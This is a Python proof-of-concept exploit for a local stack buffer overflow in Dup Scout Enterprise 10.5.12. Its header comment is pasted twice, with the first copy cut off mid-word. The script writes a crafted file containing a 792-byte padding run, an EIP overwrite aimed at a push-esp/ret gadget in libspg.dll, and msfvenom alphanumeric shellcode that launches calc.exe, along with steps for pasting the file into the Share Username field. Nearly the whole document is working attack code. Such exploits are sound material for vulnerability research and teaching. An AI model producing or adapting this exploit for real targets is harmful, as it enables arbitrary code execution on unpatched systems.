Dup Scout Enterprise 10.5.12 Share Username Buffer Overflow

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnera #!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnerable Software: Dup Scout Enterprise v10.5.12
# Vendor Homepage: http://www.dupscout.com
# Version: 10.5.12
# Software Link: http://www.dupscout.com/downloads.html
# Tested On: Windows 7 x86
#
# bad chars x00x0a and everything above x80
#
# PoC:
# 1. generate dupscout.txt, copy contents to clipboard
# 2. open app, select Server, select Connect
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
# 4. select Connect and then OK
# 5. pop calc
#

filename="dupscout.txt"

junk = "A"*792

#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
eip = "x44x11x02x10"

fill = "x43"*560

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x59x6cx6bx58x6bx32x53x30"
"x57x70x67x70x53x50x4ex69x39x75x54x71x39x50x61"
"x74x6cx4bx66x30x44x70x6cx4bx73x62x46x6cx6ex6b"
"x66x32x66x74x4ex6bx62x52x65x78x44x4fx78x37x72"
"x6ax46x46x44x71x6bx4fx4cx6cx57x4cx53x51x51x6c"
"x47x72x34x6cx47x50x69x51x6ax6fx64x4dx37x71x59"
"x57x6dx32x5ax52x51x42x61x47x4ex6bx36x32x44x50"
"x6cx4bx73x7ax55x6cx4cx4bx42x6cx52x31x63x48x6d"
"x33x32x68x43x31x5ax71x53x61x6cx4bx36x39x31x30"
"x73x31x4ex33x4cx4bx50x49x65x48x39x73x46x5ax37"
"x39x4ex6bx64x74x4ex6bx63x31x78x56x35x61x6bx4f"
"x6ex4cx39x51x7ax6fx46x6dx63x31x4bx77x50x38x6d"
"x30x32x55x79x66x35x53x71x6dx78x78x57x4bx61x6d"
"x35x74x70x75x69x74x30x58x4cx4bx30x58x31x34x75"
"x51x69x43x70x66x4cx4bx44x4cx50x4bx6cx4bx42x78"
"x75x4cx76x61x4ex33x4ex6bx57x74x4ex6bx55x51x6a"
"x70x4dx59x67x34x67x54x77x54x63x6bx53x6bx33x51"
"x42x79x73x6ax33x61x69x6fx59x70x61x4fx61x4fx42"
"x7ax6ex6bx34x52x58x6bx6ex6dx61x4dx62x4ax35x51"
"x4cx4dx4fx75x4fx42x73x30x33x30x63x30x46x30x42"
"x48x45x61x6ex6bx52x4fx4dx57x6bx4fx4ax75x4dx6b"
"x4cx30x58x35x39x32x51x46x51x78x49x36x4ax35x6f"
"x4dx4dx4dx59x6fx4ax75x55x6cx54x46x31x6cx65x5a"
"x6dx50x59x6bx49x70x31x65x37x75x4fx4bx73x77x62"
"x33x62x52x52x4fx53x5ax73x30x76x33x79x6fx68x55"
"x62x43x70x61x42x4cx35x33x76x4ex53x55x30x78x43"
"x55x43x30x41x41")

buffer = junk + eip + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()